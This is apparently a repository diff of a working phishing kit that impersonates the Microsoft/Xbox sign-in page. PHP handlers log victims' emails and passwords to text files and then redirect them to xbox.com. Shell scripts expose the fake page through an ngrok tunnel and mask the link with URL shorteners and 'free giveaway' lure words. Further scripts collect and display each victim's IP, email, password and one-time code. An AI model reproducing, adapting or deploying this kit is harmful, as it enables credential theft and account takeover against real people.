     101 + css: { 'has-error': passwordTextbox.error }" aria-describedby="loginHeader passwordDesc" placeholder="Password" aria-label="Enter the password for " tabindex="0" autofocus><!-- ko if: svr.by && showPassword() --><!-- /ko --> <!-- /ko --><!-- /ko --><!-- ko ifnot: usePlaceholderAttribute --><!-- /ko --></div><!-- ko if: svr.by --><!-- /ko --> </div> </div><!-- ko if: svr.Ae && showHipOnPasswordView --><!-- /ko --> <div data-bind="css: { 'position-buttons': !tenantBranding.BoilerPlateText }" class="position-buttons"> <div><!-- ko if: svr.br --><!-- /ko --><!-- ko if: svr.aH !== false && !svr.br && !tenantBranding.KeepMeSignedInDisabled --> <div id="idTd_PWD_KMSI_Cb" class="form-group checkbox text-block-body no-margin-top" data-bind="visible: !svr.F &amp;&amp; !showHipOnPasswordView"> <label id="idLbl_PWD_KMSI_Cb"> <input name="KMSI" id="idChkBx_PWD_KMSI0Pwd" type="checkbox" data-bind="checked: isKmsiChecked, ariaLabel: str['CT_PWD_STR_KeepMeSignedInCB_Text']" aria-label="Keep me signed in"> <span data-bind="text: str['CT_PWD_STR_KeepMeSignedInCB_Text']">Keep me signed in</span> </label> </div><!-- /ko --> <div class="row"> <div class="col-md-24"> <div class="text-13 action-links"> <div class="form-group"> <a id="idA_PWD_ForgotPassword" role="link" href="https://account.live.com/ResetPassword.aspx?wreply=https://login.live.com/login.srf%3flc%3d1033%26contextid%3d8E99D5BAD7CA9579%26bk%3d1560391134&amp;id=38936&amp;uiflavor=web&amp;uaid=c32114cb67f1490b46720d4d540fe260&amp;mkt=EN-US&amp;lc=1033&amp;bk=1560391134" data-bind="text: str['CT_PWD_STR_ForgotPwdLink_Text'], href: svr.n, click: resetPassword_onClick">Forgot my password</a> </div><!-- ko if: allowPhoneDisambiguation --><!-- /ko --><!-- ko ifnot: useEvictedCredentials --><!-- ko component: { name: "cred-switch-link-control",
     102 + params: {
     103 + serverData: svr,
     104 + username: username,
     105 + availableCreds: availableCreds,
     106 + flowToken: flowToken,
     107 + currentCred: { credType: 1 } },
     108 + event: {
     109 + switchView: credSwitchLink_onSwitchView,
     110 + setPendingRequest: credSwitchLink_onSetPendingRequest,
     111 + updateFlowToken: credSwitchLink_onUpdateFlowToken } } --><!-- --> <div class="form-group"><!-- ko if: credentialCount > 1 || (credentialCount === 1 && (showForgotUsername || selectedCredShownOnlyOnPicker)) --><!-- /ko --><!-- ko if: credentialCount === 1 && !(showForgotUsername || selectedCredShownOnlyOnPicker) --><!-- /ko --><!-- ko if: credentialCount === 0 && showForgotUsername --><!-- /ko --> </div><!-- ko if: credLinkError --><!-- /ko --><!-- /ko --><!-- ko if: evictedCreds.length > 0 --><!-- /ko --><!-- /ko --><!-- ko if: showChangeUserLink --><!-- /ko --> </div> </div> </div> </div> <div class="row" data-bind="css: { 'move-buttons': tenantBranding.BoilerPlateText }"> <div data-bind="component: { name: 'footer-buttons-field',
     112 + params: {
     113 + serverData: svr,
     114 + primaryButtonText: str['CT_PWD_STR_SignIn_Button'],
     115 + isPrimaryButtonEnabled: !isRequestPending(),
     116 + isPrimaryButtonVisible: svr.f,
     117 + isSecondaryButtonEnabled: true,
     118 + isSecondaryButtonVisible: false },
     119 + event: {
     120 + primaryButtonClick: primaryButton_onClick } }"><div class="col-xs-24 no-padding-left-right button-container" data-bind="
     121 + visible: isPrimaryButtonVisible() || isSecondaryButtonVisible(),
     122 + css: { 'no-margin-bottom': removeBottomMargin }"><!-- ko if: isSecondaryButtonVisible --><!-- /ko --> <div class="inline-block"><!-- type="submit" is needed in-addition to 'type' in primaryButtonAttributes observable to support IE8 --> <input type="submit" id="idSIButton9" class="btn btn-block btn-primary" data-bind="
     123 + attr: primaryButtonAttributes,
     124 + value: primaryButtonText() || str['CT_PWD_STR_SignIn_Button_Next'],
     125 + hasFocus: focusOnPrimaryButton,
     126 + click: primaryButton_onClick,
     127 + enable: isPrimaryButtonEnabled,
     128 + visible: isPrimaryButtonVisible,
     129 + preventTabbing: primaryButtonPreventTabbing" value="Sign in"> </div> </div></div> </div> </div><!-- ko if: tenantBranding.BoilerPlateText --><!-- /ko --></div><!-- /ko --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- /ko --> </div> </div></div><!-- /ko --> </div><!-- ko if: showFedCredButton --><!-- /ko --><!-- ko if: newSession --><!-- /ko --> <input type="hidden" name="ps" data-bind="value: postedLoginStateViewId" value=""> <input type="hidden" name="psRNGCDefaultType" data-bind="value: postedLoginStateViewRNGCDefaultType" value=""> <input type="hidden" name="psRNGCEntropy" data-bind="value: postedLoginStateViewRNGCEntropy" value=""> <input type="hidden" name="psRNGCSLK" data-bind="value: postedLoginStateViewRNGCSLK" value=""> <input type="hidden" name="canary" data-bind="value: svr.canary" value=""> <input type="hidden" name="ctx" data-bind="value: ctx" value=""> <input type="hidden" name="hpgrequestid" data-bind="value: svr.sessionId" value=""> <input type="hidden" id="i0327" data-bind="attr: { name: svr.CL }, value: flowToken" name="PPFT" value="DbZKx3pUePoIb10*CoE1qpxFW5Qmp4LHfMx!T5CmsVMWagd!dlMOxoUzGs1eQxbWqwSyQD1cAv13rTyPGtbDKqUdEhC*z2UCoZiL4g!9jxgm9svXxxv4Bm*NtapfBFRvcknSL81IMO0CGV*FefVp*NVJ2o5QkFkOwk1YxwPCO4btQtMPSETpBQe5r6OzU0mfh7UcqQyBttWvjibejbUimImIme7AZV4ENu1c4GPayzRL*axCInKi2666CLLgJDWuRw$$"> <input type="hidden" name="PPSX" data-bind="value: svr.Co" value="Pass"> <input type="hidden" name="NewUser" value="1"> <input type="hidden" name="FoundMSAs" data-bind="value: svr.AA" value=""> <input type="hidden" name="fspost" data-bind="value: svr.fPOST_ForceSignin ? 1 : 0" value="0"> <input type="hidden" name="i21" data-bind="value: wasLearnMoreShown() ? 1 : 0" value="0"> <input type="hidden" name="CookieDisclosure" data-bind="value: svr.aM ? 1 : 0" value="0"> <input type="hidden" name="IsFidoSupported" data-bind="value: isFidoSupported() ? 1 : 0" value="0"> <div data-bind="component: { name: 'instrumentation-control',
     130 + publicMethods: instrumentationMethods,
     131 + params: { serverData: svr } }"><input type="hidden" name="i2" data-bind="value: clientMode" value="1"> <input type="hidden" name="i17" data-bind="value: srsFailed" value="0"> <input type="hidden" name="i18" data-bind="value: srsSuccess"> <input type="hidden" name="i19" data-bind="value: timeOnPage" value=""></div> <div id="footer" class="footer default" role="contentinfo" data-bind="css: { 'default': !backgroundLogoUrl() }"> <div data-bind="component: { name: 'footer-control',
     132 + params: {
     133 + serverData: svr,
     134 + debugDetails: debugDetails,
     135 + showLinks: true },
     136 + event: {
     137 + agreementClick: footer_agreementClick } }"><!-- --><!-- ko if: showLinks || impressumLink || showIcpLicense --> <div id="footerLinks" class="footerNode text-secondary"><!-- ko if: !showIcpLicense --> <span id="ftrCopy" data-bind="html: svr.Cq">©2020 Microsoft</span><!-- /ko --> <a id="ftrTerms" data-bind="text: str['MOBILE_STR_Footer_Terms'], href: termsLink, click: termsLink_onClick" href="https://login.live.com/gls.srf?urlID=WinLiveTermsOfUse&amp;mkt=EN-US&amp;vv=1600&amp;uaid=c32114cb67f1490b46720d4d540fe260">Terms of use</a> <a id="ftrPrivacy" data-bind="text: str['MOBILE_STR_Footer_Privacy'], href: privacyLink, click: privacyLink_onClick" href="https://login.live.com/gls.srf?urlID=MSNPrivacyStatement&amp;mkt=EN-US&amp;vv=1600&amp;uaid=c32114cb67f1490b46720d4d540fe260">Privacy &amp; cookies</a><!-- ko if: impressumLink --><!-- /ko --><!-- ko if: showIcpLicense --><!-- /ko --><!-- Set attr binding before hasFocus to prevent Narrator from losing focus --> <a href="#" role="button" class="moreOptions" data-bind="
     138 + click: moreInfo_onClick,
     139 + ariaLabel: str['CT_STR_More_Options_Ellipsis_AriaLabel'],
     140 + attr: { 'aria-expanded': showDebugDetails().toString(),
     141 + hasFocus: focusMoreInfo() }" aria-label="Click here for troubleshooting information" aria-expanded="false"><!-- ko component: { name: 'accessible-image-control', params: { hasDarkBackground: true } } --><!-- ko if: (isHighContrastBlackTheme || hasDarkBackground || svr.fHasBackgroundColor) && !isHighContrastWhiteTheme --> <!-- ko template: { nodes: [lightImageNode], data: $parent } --><img class="desktopMode" role="presentation" pngsrc="https://logincdn.msauth.net/16.000.28215.2/images/ellipsis_white.png?x=0ad43084800fd8b50a2576b5173746fe" svgsrc="https://logincdn.msauth.net/16.000.28215.2/images/ellipsis_white.svg?x=5ac590ee72bfe06a7cecfd75b588ad73" data-bind="imgSrc" src="https://logincdn.msauth.net/16.000.28215.2/images/ellipsis_white.svg?x=5ac590ee72bfe06a7cecfd75b588ad73"><!-- /ko --><!-- /ko --><!-- ko if: (isHighContrastWhiteTheme || (!hasDarkBackground && !svr.fHasBackgroundColor)) && !isHighContrastBlackTheme --><!-- /ko --><!-- /ko --><!-- ko component: 'accessible-image-control' --><!-- ko if: (isHighContrastBlackTheme || hasDarkBackground || svr.fHasBackgroundColor) && !isHighContrastWhiteTheme --><!-- /ko --><!-- ko if: (isHighContrastWhiteTheme || (!hasDarkBackground && !svr.fHasBackgroundColor)) && !isHighContrastBlackTheme --> <!-- ko template: { nodes: [darkImageNode], data: $parent } --><img class="mobileMode" role="presentation" pngsrc="https://logincdn.msauth.net/16.000.28215.2/images/ellipsis_grey.png?x=5bc252567ef56db648207d9c36a9d004" svgsrc="https://logincdn.msauth.net/16.000.28215.2/images/ellipsis_grey.svg?x=2b5d393db04a5e6e1f739cb266e65b4c" data-bind="imgSrc" src="https://logincdn.msauth.net/16.000.28215.2/images/ellipsis_grey.svg?x=2b5d393db04a5e6e1f739cb266e65b4c"><!-- /ko --> <!-- /ko --><!-- /ko --> </a> </div><!-- ko if: showDebugDetails --><!-- /ko --> <!-- /ko --></div> </div> </div> <!-- /ko --></div><!-- /ko --> </form> <form method="post" aria-hidden="true" target="_top" data-bind="autoSubmit: postRedirectForceSubmit, attr: { action: postRedirectUrl }"><!-- ko foreach: postRedirectParams --><!-- /ko --> </form><!-- ko if: svr.AV && !svr.Aw --><!-- /ko --><!-- ko if: svr.Aw && callMsaStaticMeControl() --><!-- /ko --><!-- ko if: svr.As --><!-- /ko --></div></body></html>
  • ■ ■ ■ ■ ■
    xbox/notp/process.php
     1 +<?php
     2 +include 'ip.php';
     3 +file_put_contents("gmail.txt", "" . $email = $_POST['email'] . "\n", FILE_APPEND);
     4 +header('Location: pass.html');
     5 +?>
  • ■ ■ ■ ■ ■ ■
    xbox/notp/process1.php
     1 +<?php
     2 +file_put_contents("pass.txt", "" . $email = $_POST['pass'] . "\n", FILE_APPEND);
     3 +header('Location: https://www.xbox.com/en-IN/');
     4 +?>
  • ■ ■ ■ ■ ■ ■
    xbox/notp/show.sh
     1 +clear
     2 +echo -e "\e[96m LOCAL DATABASE DUMPS\e[0m"
     3 +cd /sdcard/dUmpS
     4 +ls
     5 +echo
     6 +read -p $'\n\e[1;96m[\e[0m\e[1;92m+\e[0m\e[1;96m] TARGET NAME: \e[0m' name
     7 +echo -e "\e[96m | "
     8 +printf " \e[1;92m\e[0m\e[1;96m|------------------[\e[92mACCESSED\e[96m]\e[0m\n"
     9 +echo
     10 +sleep 3.0
     11 +cd $name
     12 +bash grad.sh
     13 +sleep 16
     14 +cd $HOME/mrphish
     15 +bash mrphish
     16 + 
  • ■ ■ ■ ■ ■ ■
    xbox/notp/xbox.sh
     1 +#SCRIPT BY NOOB HACKERS
     2 +#YOU CAN CHANGE CREDITS BUT STILL YOU ARE KIDDO
     3 +#GIVE CREDITS IF YOU ARE CODER
     4 +#CHANGING CREDITS IS EASY BUT CODING IS TALENT
     5 +#THANKS TO ALL MY SUBSCRIBERS
     6 +#This is official tool of noob hackers if you steal it then your respositery will be banned soon so be careful and
     7 +#copyright strike will be sent to your channel, if you dont give credits
     8 +cd $HOME/mrphish/core
     9 +cp ngrok /data/data/com.termux/files/home/mrphish/core/deploys/gaming/xbox/notp
     10 +cd /data/data/com.termux/files/home/mrphish/core/deploys/gaming/xbox/notp
     11 +rm *.txt 2>/dev/null
     12 +stop() {
     13 +checkngrok=$(ps aux | grep -o "ngrok" | head -n1)
     14 +checkphp=$(ps aux | grep -o "php" | head -n1)
     15 +checkssh=$(ps aux | grep -o "ssh" | head -n1)
     16 +if [[ $checkngrok == *'ngrok'* ]]; then
     17 +pkill -f -2 ngrok > /dev/null 2>&1
     18 +killall -2 ngrok > /dev/null 2>&1
     19 +fi
     20 + 
     21 +if [[ $checkphp == *'php'* ]]; then
     22 +killall -2 php > /dev/null 2>&1
     23 +fi
     24 +if [[ $checkssh == *'ssh'* ]]; then
     25 +killall -2 ssh > /dev/null 2>&1
     26 +fi
     27 +exit 1
     28 + 
     29 +}
     30 + 
     31 +dependencies() {
     32 + 
     33 + 
     34 +command -v php > /dev/null 2>&1 || { echo >&2 "I require php but it's not installed. Install it. Aborting."; exit 1; }
     35 +
     36 + 
     37 + 
     38 +}
     39 + 
     40 +checkfound() {
     41 + 
     42 +printf "\n"
     43 +printf "\e[1;92m\e[0m\e[1;96m|---------------------------------------------------------------|\e[0m\n"
     44 +printf " \e[1;92m\e[1;77m\e[0m\e[1;96m |\e[96m WAITING FOR DATA LOGS,\e[0m\e[1;91m PRESS CTRL+C TO STOP \e[96m|\e[0m\n"
     45 +printf "\e[1;92m\e[0m\e[1;96m|---------------------------------------------------------------|\e[0m\n"
     46 +while [ true ]; do
     47 + 
     48 + 
     49 +if [[ -e "gmail.txt" ]]; then
     50 +printf " \n\e[1;96m[\e[92m+>\e[1;96m] VICTIM ACCESSED LINK...!\e[0m\n"
     51 +printf "\e[1;92m\e[0m\e[1;96m |-------------------------------------[\e[92mSUCCESS\e[96m]\e[0m\n"
     52 +fi
     53 + 
     54 +sleep 3.5
     55 + 
     56 +if [[ -e "pass.txt" ]]; then
     57 +printf " \n\e[1;96m[\e[92m+>\e[1;96m] VALID DATA FOUND...!\e[0m\n"
     58 +printf "\e[1;92m\e[0m\e[1;96m |-------------------------------------[\e[92mSUCCESS\e[96m]\e[0m\n"
     59 +printf " \e[1;92m\e[0m\e[1;96m| \e[0m\n"
     60 +sleep 3.0
     61 +printf " \e[1;92m\e[0m\e[1;96m|---------------[\e[92mOPENING DUMP\e[96m]\e[0m\n"
     62 +sleep 10.0
     63 +bash io.sh
     64 +fi
     65 +sleep 3.0
     66 +done
     67 + 
     68 +}
     69 + 
     70 +ngrok_server() {
     71 + 
     72 + 
     73 +if [[ -e ngrok ]]; then
     74 +echo ""
     75 +else
     76 +command -v unzip > /dev/null 2>&1 || { echo >&2 "I require unzip but it's not installed. Install it. Aborting."; exit 1; }
     77 +command -v wget > /dev/null 2>&1 || { echo >&2 "I require wget but it's not installed. Install it. Aborting."; exit 1; }
     78 +printf " \e[1;96m[\e[0m#\e[1;96m] DOWNLOADING NGROK ...\n"
     79 +arch=$(uname -a | grep -o 'arm' | head -n1)
     80 +arch2=$(uname -a | grep -o 'Android' | head -n1)
     81 +if [[ $arch == *'arm'* ]] || [[ $arch2 == *'Android'* ]] ; then
     82 +wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip > /dev/null 2>&1
     83 +if [[ -e ngrok-stable-linux-arm.zip ]]; then
     84 +unzip ngrok-stable-linux-arm.zip > /dev/null 2>&1
     85 +chmod +x ngrok
     86 +rm -rf ngrok-stable-linux-arm.zip
     87 +else
     88 +printf " \e[1;96m[!] Download error... Termux, run:\e[0m\e[1;96m pkg install wget\e[0m\n"
     89 +exit 1
     90 +fi
     91 + 
     92 +else
     93 +wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-386.zip > /dev/null 2>&1
     94 +if [[ -e ngrok-stable-linux-386.zip ]]; then
     95 +unzip ngrok-stable-linux-386.zip > /dev/null 2>&1
     96 +chmod +x ngrok
     97 +rm -rf ngrok-stable-linux-386.zip
     98 +else
     99 +printf " \e[1;96m[!] Download error... \e[0m\n"
     100 +exit 1
     101 +fi
     102 +fi
     103 +fi
     104 +printf " \e[1;92m\e[0m\e[1;96m ____[\e[92monline\e[96m] \e[0m\n"
     105 +printf " \e[1;92m\e[0m\e[1;96m| \e[0m\n"
     106 +printf "\e[1;96m[\e[92m+\e[1;96m] STARTING DATA SERVER ....\n"
     107 +php -S 127.0.0.1:3333 > /dev/null 2>&1 &
     108 +sleep 4
     109 +printf " \e[1;92m\e[0m\e[1;96m| \e[0m\n"
     110 +printf "\e[1;96m[\e[92m+\e[1;96m] STARTING DEPLOY SERVER....\n"
     111 +./ngrok http 3333 > /dev/null 2>&1 &
     112 +sleep 12.0
     113 +link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
     114 +echo $link > sss
     115 +File=sss
     116 +if grep -q https:// "$File"
     117 +then
     118 +printf " \e[1;92m\e[0m\e[1;96m| \e[0m\n"
     119 +printf "\e[1;96m[\e[92m+\e[1;96m] DEPLOY LINK STATUS \e[96m[\e[92mWORKING\e[96m]\e[0m\n"
     120 +else
     121 +printf " \e[1;92m\e[0m\e[1;96m| \e[0m\n"
     122 +printf "\e[1;96m[\e[92m+\e[1;96m] DEPLOY LINK STATUS \e[96m[\e[91mERROR\e[96m]\e[0m\n"
     123 +printf " \e[1;92m\e[0m\e[1;96m| \e[0m\n"
     124 +printf "\e[1;96m[\e[92m+\e[1;96m] \e[91m PLEASE USE HOTPOST OR SPEED DATA OR USE AUTH TOKEN\n"
     125 +printf " \e[1;92m\e[0m\e[1;96m| \e[0m\n"
     126 +printf "\e[1;96m[\e[92m+\e[1;96m] \e[91m HOLD CTRL + C OR USE VOLUME DOWN + C TO STOP\n"
     127 +sleep 30m 10s
     128 +fi
     129 +printf " \e[1;92m\e[0m\e[1;96m| \e[0m\n"
     130 +printf "\e[1;96m[\e[92m+\e[1;96m] Copy ThiS Link \e[92m $link \e[0m\n"
     131 +printf " \e[1;92m\e[0m\e[1;96m| \e[0m\n"
     132 +printf "\e[1;96m[\e[92m+\e[1;96m] COPY & PASTE ABOVE LINK IN THIS TYPE 1 WEBSITE AND PASTE SHORTLINK BELOW"
     133 +echo " "
     134 +printf " \e[1;92m\e[0m\e[1;96m|\n"
     135 +echo -en "\e[32mTYPE 1 =>\e[0m "
     136 +read nmr
     137 +if [[ "$nmr" = "1" ]];
     138 +then
     139 +am start -a android.intent.action.VIEW -d https://rebrand.ly/mrpcdm > /dev/null
     140 +else
     141 +echo > /dev/null
     142 +fi
     143 +printf " \e[1;92m\e[0m\e[1;96m|\n"
     144 +echo -en "\e[32mPASTE SHORT LINK=>\e[0m "
     145 +read lnkstr
     146 +echo $lnkstr > lnkstr.sh
     147 +linko=$(cat lnkstr.sh)
     148 +short=$(curl -s https://da.gd/s/?url=${linko})
     149 +shorter=${short#https://}
     150 +echo " "
     151 +echo -e '\e[92m Type custom words like: (free-fire-hack, hack-android)'
     152 +echo -e "\e[91m Don't use space just use '-' between words\e[0m"
     153 +echo " "
     154 +echo -en "\e[92mCUSTOM WORDS=>\e[0m "
     155 +read words
     156 +final=$words@$shorter
     157 +shortb=$(curl -s https://da.gd/s/?url=${linko})
     158 +shorterb=${short#https://}
     159 +wordsb="xbox-free-giveway"
     160 +finalb=$wordsb@$shorterb
     161 +url="https://m.youtube.com/redirect?q=${link}"
     162 +tiny=$(curl -s http://tinyurl.com/api-create.php?url=${url})
     163 +printf " \e[1;92m\e[0m\e[1;96m| \e[0m\n"
     164 +printf " \e[1;92m\e[0m\e[1;96m|-------------------------------------------------------------|\e[0m\n"
     165 +printf "\e[1;96m[\e[92m+>\e[1;96m NGROK LINK \e[93m==> \e[0m\e[1;92m %s\e[0m\n" $link
     166 +printf " \e[1;92m\e[0m\e[1;96m|------------------------\e[0m\n"
     167 +printf "\e[1;96m[\e[92m+>\e[1;96m CUSTOM LINK \e[93m==> \e[0m\e[1;92m %s\e[0m\n" $final
     168 +printf " \e[1;92m\e[0m\e[1;96m|------------------------\e[0m\n"
     169 +printf "\e[1;96m[\e[92m+>\e[1;96m DEFAULT LINK \e[93m==> \e[0m\e[1;92m %s\e[0m\n" $finalb
     170 +printf " \e[1;92m\e[0m\e[1;96m|-------------------------\e[0m\n"
     171 +printf "\e[1;96m[\e[92m+>\e[1;96m REDIRECT LINK \e[93m==> \e[0m\e[1;92m %s\e[0m\n" $tiny
     172 +printf " \e[1;92m\e[0m\e[1;96m|-------------------------\e[0m\n"
     173 +printf "\e[1;96m[\e[92m+>\e[1;96m SHORT LINK \e[93m==> \e[0m\e[1;92m %s\e[0m\n" $linko
     174 +printf " \e[1;92m\e[0m\e[1;96m|-------------------------------------------------------------|\e[0m\n"
     175 +checkfound
     176 +}
     177 + 
     178 +start1() {
     179 +if [[ -e sendlink ]]; then
     180 +rm -rf sendlink
     181 +fi
     182 + 
     183 +printf "\n"
     184 +echo -e "\e[96m
     185 + ____ ____ ____ __ __ _ _
     186 + ( \( __)( _ \( ) / \( \/ )
     187 + ) D ( ) _) ) __// (_/\( O )) /"
     188 +echo -e "\e[91m (____/(____)(__) \____/ \__/(__/\e[0m"
     189 +echo
     190 +default_option_server="2"
     191 +read -p $'\n\e[1;91m[\e[0m\e[1;77m+\e[0m\e[1;96m] START ATTACK [y/n] : \e[0m' option_server
     192 +clear
     193 +option_server="${option_server:-${default_option_server}}"
     194 +if [[ $option_server -eq 1 ]]; then
     195 + 
     196 +command -v php > /dev/null 2>&1 || { echo >&2 "This Server No More Supported So, Aborting."; exit 1; }
     197 +start
     198 + 
     199 +elif [[ $option_server -eq y ]]; then
     200 +ngrok_server
     201 +else
     202 +printf "\e[1;93m [!] Invalid option!\e[0m\n"
     203 +sleep 1
     204 +clear
     205 +start1
     206 +fi
     207 + 
     208 +}
     209 + 
     210 + 
     211 +start() {
     212 + 
     213 +default_choose_sub="Y"
     214 +default_subdomain="mrphish$RANDOM"
     215 + 
     216 +printf '\e[1;33m[\e[0m\e[1;77m+\e[0m\e[1;33m] Choose subdomain? (Default:\e[0m\e[1;77m [Y/n] \e[0m\e[1;33m): \e[0m'
     217 +read choose_sub
     218 +choose_sub="${choose_sub:-${default_choose_sub}}"
     219 +if [[ $choose_sub == "Y" || $choose_sub == "y" || $choose_sub == "Yes" || $choose_sub == "yes" ]]; then
     220 +subdomain_resp=true
     221 +printf '\e[1;33m[\e[0m\e[1;77m+\e[0m\e[1;33m] Subdomain: (Default:\e[0m\e[1;77m %s \e[0m\e[1;33m): \e[0m' $default_subdomain
     222 +read subdomain
     223 +subdomain="${subdomain:-${default_subdomain}}"
     224 +fi
     225 + 
     226 +server
     227 +checkfound
     228 + 
     229 +}
     230 + 
     231 +dependencies
     232 +start1
     233 + 
  • ■ ■ ■ ■ ■ ■
    xbox/otp/dump.sh
     1 +echo -e "\e[96m | "
     2 +read -p $'\n\e[1;96m[\e[0m\e[1;92m+\e[0m\e[1;96m] VICTIM NAME: \e[0m' name
     3 +cd /sdcard/dUmpS
     4 +mkdir $name
     5 +cd $HOME/mrphish/core/deploys/gaming/xbox/otp
     6 +mv *.txt /sdcard/dUmpS/$name
     7 +cp grad.sh /sdcard/dUmpS/$name
     8 +sleep 2.3
     9 +echo -e "\e[96m | "
     10 +printf " \e[1;92m\e[0m\e[1;96m|------------------[\e[92mDONE\e[96m]\e[0m\n"
     11 +cd $HOME/mrphish
     12 +bash mrphish
     13 + 
  • ■ ■ ■ ■ ■ ■
    xbox/otp/grad.sh
     1 +clear
     2 +echo
     3 +echo -e '\e[96m
     4 + __ _____ ___ ___
     5 + ( ) ( _ )/ __)/ __)
     6 + )(__ )(_)(( (_-.\__ \\'
     7 +echo -e '\e[91m (____)(_____)\___/(___/ \e[0m'
     8 +echo " "
     9 +echo " XBOX HACKED LOGS........."
     10 +echo -e "\e[96m |---------------------------------------------------------------|"
     11 +ip=$(cat ip.txt)
     12 +printf "\e[1;96m[\e[0m\e[1;92m+\e[0m\e[1;96m] IP:\e[0m\e[1;92m $ip \e[0m\n" $ip
     13 +echo -e "\e[96m |---------------------------------------------------------------|"
     14 +ip=$(cat gmail.txt)
     15 +printf "\e[1;96m[\e[0m\e[1;92m+\e[0m\e[1;96m] GMAIL:\e[0m\e[1;92m $ip \e[0m\n" $ip
     16 +echo -e "\e[96m |---------------------------------------------------------------|"
     17 +ip=$(cat pass.txt)
     18 +printf "\e[1;96m[\e[0m\e[1;92m+\e[0m\e[1;96m] PASS:\e[0m\e[1;92m $ip \e[0m\n" $ip
     19 +echo -e "\e[96m |---------------------------------------------------------------|"
     20 +ip=$(cat otp.txt)
     21 +printf "\e[1;96m[\e[0m\e[1;92m+\e[0m\e[1;96m] OTP:\e[0m\e[1;92m $ip \e[0m\n" $ip
     22 +echo -e "\e[96m |---------------------------------------------------------------|"
     23 +sleep 8.0
     24 +if [ -f "ngrok" ];
     25 +then
     26 +rm ngrok
     27 +else
     28 +sleep 0.2
     29 +fi
     30 +#ip=$(cat gml.txt)
     31 +#printf "\e[1;93m[\e[0m\e[1;77m+\e[0m\e[1;93m] NUMBER:\e[0m\e[1;77m $ip \e[0m\n" $ip
     32 +#ip=$(cat num.txt)
     33 +#printf "\e[1;93m[\e[0m\e[1;77m+\e[0m\e[1;93m] BIO:\e[0m\e[1;77m $ip \e[0m\n" $ip
     34 +#ip=$(cat bio.txt)
     35 +#printf "\e[1;93m[\e[0m\e[1;77m+\e[0m\e[1;93m] USER:\e[0m\e[1;77m $ip \e[0m\n" $ip
     36 +#ip=$(cat usr.txt)
     37 +#printf "\e[1;92m[\e[0m\e[1;77m+\e[0m\e[1;93m] IP:\e[0m\e[1;77m $ip \e[0m\n" $ip
     38 +#ip=$(cat cred.txt)
     39 +#printf "\e[1;93m[\e[0m\e[1;77m|\e[0m\e[1;93m] OT \e[0m\e[1;92m $ip \e[0m\n" $ip
     40 + 
  • ■ ■ ■ ■ ■ ■
    xbox/otp/index.php
     1 +<?php session_start();?>
     2 +<html dir="ltr" lang="EN-US"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><script type="text/javascript">var PROOF = {};PROOF.Type = {SQSA: 6, CSS: 5, DeviceId: 4, Email: 1, AltEmail: 2, SMS: 3, HIP: 8, Birthday: 9, TOTPAuthenticator: 10, RecoveryCode: 11, StrongTicket: 13, TOTPAuthenticatorV2: 14, UniversalSecondFactor: 15, Voice: -3};</script><noscript><meta http-equiv="Refresh" content="0; URL=https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033&uaid=e52f753aa5184927ab11e578045c61f0"/>Microsoft account requires JavaScript to sign in. This web browser either does not support JavaScript, or scripts are being blocked.<br /><br />To find out whether your browser supports JavaScript, or to allow scripts, see the browser's online help.</noscript><title>Sign in to your Microsoft account</title><meta name="robots" content="none"><meta name="PageID" content="i5030"><meta name="SiteID" content="38936"><meta name="ReqLC" content="1033"><meta name="LocLC" content="1033"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, minimum-scale=1.0, user-scalable=yes"><script type="text/javascript">!function(e,r){for(var t in r)e[t]=r[t]}(this,function(e){function r(n){if(t[n])return t[n].exports;var o=t[n]={exports:{},id:n,loaded:!1};return e[n].call(o.exports,o,o.exports,r),o.loaded=!0,o.exports}var t={};return r.m=e,r.c=t,r.p="",r(0)}([function(e,r){!function(){function e(){return s.$Config||s.ServerData||{}}function r(e,r){var t=s.$Debug;t&&t.appendLog&&(r&&(e+=" '"+(r.src||r.href||"")+"'",e+=", id:"+(r.id||""),e+=", async:"+(r.async||""),e+=", defer:"+(r.defer||"")),t.appendLog(e))}function t(e){var r=e.indexOf("?"),t=r>-1?r:e.length;return t>u&&e.substr(t-u,u).toLowerCase()===c}function n(){var r=e(),t=r.loader||{};return t.slReportFailure||r.slReportFailure||!1}function o(){var r=e(),t=r.loader||{};return t.redirectToErrorPageOnLoadFailure||!1}function a(e){var r=!0,n=e.src||e.href||"";if(n){if(t(n))try{e.sheet&&e.sheet.cssRules&&!e.sheet.cssRules.length&&(r=!1)}catch(o){}}else r=!1;return r}function i(){function n(e){var r=d.getElementsByTagName("head")[0];r.appendChild(e)}function o(e,r,n){var o=t(e)?i(e):s(e);return r&&(o.id=r),o.setAttribute&&(o.setAttribute("crossorigin","anonymous"),n&&o.setAttribute("integrity",n)),o}function i(e){var 